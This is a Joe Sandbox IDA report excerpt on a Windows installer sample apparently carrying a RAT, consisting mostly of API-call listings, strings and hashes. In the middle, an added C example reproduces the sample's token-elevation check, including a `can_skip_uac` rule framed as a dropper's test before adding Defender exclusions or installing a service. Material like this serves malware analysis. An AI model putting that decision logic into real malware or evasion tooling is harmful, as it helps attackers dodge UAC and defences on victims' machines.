                                                                                    • GlobalFindAtomW.KERNEL32(00000000,?,00000000,00000000,005A4B86,?,?,00000000,00000001,005A2E83,?,00000000,00000000,00000000,00000000), ref: 004F916F
                                                                                    • GetPropW.USER32(00000000,00000000), ref: 004F9186
                                                                                    Similarity
                                                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2582817389-0
                                                                                    • Opcode ID: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction ID: 6cdfd07cd157af09d6636e7e024685bcdc2838eed951bc29520a0badc25c7c68
                                                                                    • Opcode Fuzzy Hash: 25ecc4edb2365f2cde5ab71ba1d4f521c8a402254a91719a356be1fc28b1867b
                                                                                    • Instruction Fuzzy Hash: 32F0306260021666B72477B6AE85AFB328C8A057A5740297FFA01D7216D57CCC8283BD
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CountSleepTick
                                                                                    • String ID:
                                                                                    • API String ID: 2227064392-0
                                                                                    • Opcode ID: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction ID: 8c410b6b5025aaf122e9bdc0c1ce3c8724fef5309a0de07dabf959826b4bab6c
                                                                                    • Opcode Fuzzy Hash: 0d34409079f3285415336e5086e324ebfbbd45d85097019a7f8f2458989eb29f
                                                                                    • Instruction Fuzzy Hash: 40E0E57230C2410EA32032AE18866BE594BDA97394F35097BF180C1216CD088C968136
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000008), ref: 0063DA4D
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008), ref: 0063DA53
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenElevationType; the report annotates this class as TokenIntegrityLevel, but 0x12 = 18 is TokenElevationType in TOKEN_INFORMATION_CLASS, TokenIntegrityLevel is 0x19 = 25, and the 4-byte buffer length matches a TOKEN_ELEVATION_TYPE enum),00000000,00000004,00000008,00000000,00000008), ref: 0063DA75
                                                                                    • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 0063DA86
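The four calls above are a self-check of the running token before the installer decides what it may do without a UAC prompt. The example below is added here and is not code from the Joe Sandbox report or from the analysed sample: it reproduces the same sequence (GetCurrentProcess, OpenProcessToken with TOKEN_QUERY = 0x8, GetTokenInformation, CloseHandle) for both TokenElevationType (class 0x12, which is what the 4-byte buffer in the report fits) and TokenIntegrityLevel (class 0x19), and decodes the results. Function names, the `can_skip_uac` decision rule and the 64-byte label buffer are this example's own choices. The Windows calls are compiled only under `_WIN32`; on other hosts the query functions return -1 so the decoders can still be exercised. One caveat a reviewer should keep in mind: the strings elsewhere in this module (`/INITPROCWND=`, "Restarting Windows.", "Not restarting Windows because Uninstall is being run from the debugger.") are characteristic of an Inno Setup installer stub, so this token check is more likely the packaging layer's code than the RAT payload's; that is an inference from the strings, not something the report states.

```c
/* Added example: query and decode the token facts the sample asks for.
   Not from the Joe Sandbox report or the sample; names are this example's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* TOKEN_ELEVATION_TYPE values, returned as a 4-byte enum for class 0x12. */
#define ELEV_DEFAULT 1   /* no split token: UAC off, or user is not an admin */
#define ELEV_FULL    2   /* elevated half of a split admin token */
#define ELEV_LIMITED 3   /* filtered half; an elevated linked token exists */

/* Mandatory-label RIDs: last sub-authority of S-1-16-<rid>. */
#define IL_LOW    0x1000
#define IL_MEDIUM 0x2000
#define IL_HIGH   0x3000
#define IL_SYSTEM 0x4000

const char *elevation_type_name(uint32_t t) {
    switch (t) {
    case ELEV_DEFAULT: return "Default";
    case ELEV_FULL:    return "Full";
    case ELEV_LIMITED: return "Limited";
    default:           return "Unknown";
    }
}

/* Values between named levels (e.g. medium-plus, 0x2100) round down,
   which is how the kernel compares mandatory labels. */
const char *integrity_level_name(uint32_t rid) {
    if (rid >= IL_SYSTEM) return "System";
    if (rid >= IL_HIGH)   return "High";
    if (rid >= IL_MEDIUM) return "Medium";
    if (rid >= IL_LOW)    return "Low";
    return "Untrusted";
}

/* Hypothetical decision rule a dropper would apply before writing Defender
   exclusions or installing a service: no prompt is needed for the Full half
   of a split token, or for a Default (unsplit) token already at High/System. */
int can_skip_uac(uint32_t elev_type, uint32_t il_rid) {
    if (elev_type == ELEV_FULL) return 1;
    if (elev_type == ELEV_DEFAULT && il_rid >= IL_HIGH) return 1;
    return 0;
}

#ifdef _WIN32
/* Same call shape as the sample: GetCurrentProcess -> OpenProcessToken(TOKEN_QUERY)
   -> GetTokenInformation -> CloseHandle. Returns 0 on success, -1 on failure. */
static int query_token_u32(TOKEN_INFORMATION_CLASS cls, int is_sid_label, uint32_t *out) {
    HANDLE tok;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) return -1;
    int rc = -1;
    DWORD len = 0;
    if (!is_sid_label) {
        DWORD v = 0;                          /* 4-byte buffer, as in the report */
        if (GetTokenInformation(tok, cls, &v, sizeof v, &len)) { *out = v; rc = 0; }
    } else {
        ULONGLONG buf[8];                     /* 64 bytes, aligned; S-1-16-x label fits easily */
        if (GetTokenInformation(tok, cls, buf, sizeof buf, &len)) {
            PSID sid = ((TOKEN_MANDATORY_LABEL *)buf)->Label.Sid;
            *out = *GetSidSubAuthority(sid, *GetSidSubAuthorityCount(sid) - 1);
            rc = 0;
        }
    }
    CloseHandle(tok);
    return rc;
}
#endif

int query_elevation_type(uint32_t *out) {
#ifdef _WIN32
    return query_token_u32(TokenElevationType, 0, out);
#else
    (void)out; return -1;                     /* not a Windows host: nothing to query */
#endif
}

int query_integrity_rid(uint32_t *out) {
#ifdef _WIN32
    return query_token_u32(TokenIntegrityLevel, 1, out);
#else
    (void)out; return -1;
#endif
}

int main(void) {
    uint32_t et, il;
    if (query_elevation_type(&et) == 0 && query_integrity_rid(&il) == 0)
        printf("elevation=%s integrity=%s (0x%04x) skip_uac=%d\n",
               elevation_type_name(et), integrity_level_name(il), il, can_skip_uac(et, il));
    else
        puts("token query unavailable on this host");
    return 0;
}
```

On Windows this links against advapi32 (`cl example.c advapi32.lib` or `gcc example.c -ladvapi32`). Running it once from a normal prompt and once from an elevated prompt shows the Limited/Medium versus Full/High pair that a dropper's branch on this result distinguishes.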
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                    • String ID:
                                                                                    • API String ID: 215268677-0
                                                                                    • Opcode ID: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction ID: a157fd3303c1430b13f319c7757610127fd6bd2de266f3ae7d41e5c3beec6acc
                                                                                    • Opcode Fuzzy Hash: 52eacd67af02c92b88f6b7150cd3555fd3abc884029a5d5279a962a9430070f6
                                                                                    • Instruction Fuzzy Hash: 59F030706483006BD700EBA5DD82EDB76DCAF44394F00492EBF94C7291E678D95897A2
                                                                                    APIs
                                                                                    • GetDC.USER32 ref: 004E43D9
                                                                                    • SelectObject.GDI32(00000000,058A00B4), ref: 004E43EB
                                                                                    • GetTextMetricsW.GDI32(00000000), ref: 004E43F6
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004E4407
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MetricsObjectReleaseSelectText
                                                                                    • String ID:
                                                                                    • API String ID: 2013942131-0
                                                                                    • Opcode ID: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction ID: d4d349d3644daeae5b714f5edb0297babd8c78eacc5647d64bd84649639e733b
                                                                                    • Opcode Fuzzy Hash: a6aecb0737437b3e4e44ddca18d58a6d0b7d8c9274c0db10c9c3bc7fb89915e8
                                                                                    • Instruction Fuzzy Hash: 33E04F617026A126D61161A75D82BEB274C4F423AAF08012AFD54D92E3DA4DCD62C2FA
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageNotifySend
                                                                                    • String ID: HW[$MS PGothic
                                                                                    • API String ID: 3556456075-2635353643
                                                                                    • Opcode ID: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction ID: bceb75bb431b8eb4c574679ca4a5eb6d1cf06a39740a1e3265182ded441c346e
                                                                                    • Opcode Fuzzy Hash: 59f04f6aee3bffc9c1295158f9acede3f64b47b25c96f5cb70cb93cdb20aa1c8
                                                                                    • Instruction Fuzzy Hash: EC5140703102018BCB10EF69D985E967BA3FB55304B14517AF845AF3A7CA78EC46CF9A
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC0
                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,005F8C6D,?,0066978C,?,00000003,00000000,00000000,?,006444C3,00000000,006445EE), ref: 005F8BC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: .tmp
                                                                                    • API String ID: 1375471231-2986845003
                                                                                    • Opcode ID: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction ID: c4b9951d0c9cc56d7ffc3af5a52d4afc2fe12c17b36d5983631b7f23f90a8f37
                                                                                    • Opcode Fuzzy Hash: 0dd2e78ac53445f243b90664175e46d6b94ca7fdf7539982ce6cd959b1b8a79f
                                                                                    • Instruction Fuzzy Hash: 32214675A0010D9FDB00EBA4C956AFEB7F9FB88304F50457AF900B7381DA386E058AA4
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 0064EC72
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window
                                                                                    • String ID: /INITPROCWND=$%x $@
                                                                                    • API String ID: 2353593579-4169826103
                                                                                    • Opcode ID: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction ID: 8b2991d2d1f953f99e0989ce018fc3471add5941c41498d69d44fc2df87f3202
                                                                                    • Opcode Fuzzy Hash: 10bae26bf5f2a0ea0e044a5652ad93d77c5c1b14996636414ded1eee9e9c8fb2
                                                                                    • Instruction Fuzzy Hash: A321A234A043499FDB04EBA4DC91EEEBBF6FF49304F64447AE500E7291DA799904C754
                                                                                    APIs
                                                                                      • Part of subcall function 005FA9A8: GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                      • Part of subcall function 005FA9A8: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • SetForegroundWindow.USER32(?), ref: 0064FAE0
                                                                                    Strings
                                                                                    • Restarting Windows., xrefs: 0064FAB7
                                                                                    • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0064FB17
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                    • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                    • API String ID: 3179053593-4147564754
                                                                                    • Opcode ID: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction ID: d4bf9f36ef96bf7cd5cd4c99b625b6b1cd4e930e58df0cf614d5cda783460847
                                                                                    • Opcode Fuzzy Hash: 6f7ce231d12e7b0590e1307c51da8fb0449973e99580584b367fabd86af75305
                                                                                    • Instruction Fuzzy Hash: 341182346002449FEB04EB94E896FD837E6EB46304F5150BAF804AB3E2CB78AD41C716
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID: lF$lF
                                                                                    • API String ID: 2422867632-1147170537
                                                                                    • Opcode ID: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction ID: c79f99a2a18cb61d71feea710bf58fa565dd156bb3bf8665f6744fc7077f86ea
                                                                                    • Opcode Fuzzy Hash: 92e9bf36f33061f7ffdd7491b72976703523c6d92d1ec2ca90417502ef735539
                                                                                    • Instruction Fuzzy Hash: 33017171605214AFC750CF9D9980B8EB7ECDB58361F10443AF508E73C1DA75DD0087A8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID: B)[$TWindowDisabler-Window
                                                                                    • API String ID: 716092398-1377837600
                                                                                    • Opcode ID: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction ID: d28f3a87fa927ce1738d04863a1b4a791b24e040aa09da8391ad3ec004184475
                                                                                    • Opcode Fuzzy Hash: 684ecf370dcf3c6758cf9d82a20f104a3e22c221ceaad4062406452089a2450d
                                                                                    • Instruction Fuzzy Hash: 74F074B2604118AF8B40DE9DDC81EDB77ECEB4D264B05412ABA08E3201D634ED118BA4
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(2C), ref: 00430A04
                                                                                      • Part of subcall function 00408B6C: SysReAllocStringLen.OLEAUT32(00000000,?,00000071), ref: 00408B86
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInitStringVariant
                                                                                    • String ID: 2C$WC
                                                                                    • API String ID: 4010818693-495268985
                                                                                    • Opcode ID: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction ID: 96bda85ea37abc6d5613da839bc8b5d910035a35706cb6c2dd4bd2584f76f0b9
                                                                                    • Opcode Fuzzy Hash: df370b3d9da647af4402dd277e6d6925b7b152161429339756cd47c20e76cd35
                                                                                    • Instruction Fuzzy Hash: F1F0A471700608AFD700EB99DC92E9FB3FCEB48700FA04176F500E3290DA78AE0486A9
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0064413B,00000000,00644156,?,00000000,00000000,?,0064F4D6,00000006), ref: 00643DB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                                    • API String ID: 3535843008-1113070880
                                                                                    • Opcode ID: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction ID: 79ba88330415bd06f82effed11eda8edd571365fffeee20c77ff8264b35cb024
                                                                                    • Opcode Fuzzy Hash: 301571e57bfd22d937d0251fdeb13fcc7fbfda80df1ff37fee867360dc904415
                                                                                    • Instruction Fuzzy Hash: E9F0B470B04194AFDB10DAD4DD46BAA7BAFEF85344F241029E2409B391D6B0EF40CB55
                                                                                    APIs
                                                                                      • Part of subcall function 006449EC: FreeLibrary.KERNEL32(?,00650648,00000000,00650657,?,?,?,?,?,0065113B), ref: 00644A02
                                                                                      • Part of subcall function 006446DC: GetTickCount.KERNEL32 ref: 00644724
                                                                                      • Part of subcall function 00600808: SendMessageW.USER32(?,00000B01,00000000,00000000), ref: 00600827
                                                                                    • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0065113B), ref: 00650671
                                                                                    • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0065113B), ref: 00650677
                                                                                    Strings
                                                                                    • Detected restart. Removing temporary directory., xrefs: 0065062B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                    • String ID: Detected restart. Removing temporary directory.
                                                                                    • API String ID: 1717587489-3199836293
                                                                                    • Opcode ID: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction ID: 464bd2d836879dd3474a0288fef1e2a55e7a5b05e4adc84fe2957298e905eb94
                                                                                    • Opcode Fuzzy Hash: 6f776ffacad2af89d35688e394897bf6e83705840bcb12dca368fa9c17a4540f
                                                                                    • Instruction Fuzzy Hash: F1E0ABB52483402EF39137F6BC13A5B3F4EE7C7362F61043AFA0481441CC599864C138
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1C62
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                      • Part of subcall function 005B1BAC: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005B1CA2,?,00000004,006619DC,006006F2,00600B6C,00600610,?,00000B06,00000000,00000000), ref: 005B1BC3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
                                                                                    • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                    • API String ID: 1883125708-2676053874
                                                                                    • Opcode ID: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction ID: 9df0a5d5a98339ba50c13b8e37e12c07401c504aaeadd98406a6411a3d2f2949
                                                                                    • Opcode Fuzzy Hash: 6878c14f71f69b0723f96bc96d4fcaf4194bacb9fe624374ffc45413c8f78ab0
                                                                                    • Instruction Fuzzy Hash: 6DF05C302B07109FD7416F659C44FD53EADFB44342F401924F504962A0C7F41C80C76C
                                                                                    APIs
                                                                                      • Part of subcall function 005B1D88: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005B1D06,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F), ref: 005B1D96
                                                                                    • GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,0064F751,0000000A,00000002,00000001,00000031,00000000,0064F97F,?,00000000,0064FA4C), ref: 005B1D10
                                                                                      • Part of subcall function 00411E58: GetProcAddress.KERNEL32(?,?), ref: 00411E82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule$AddressProc
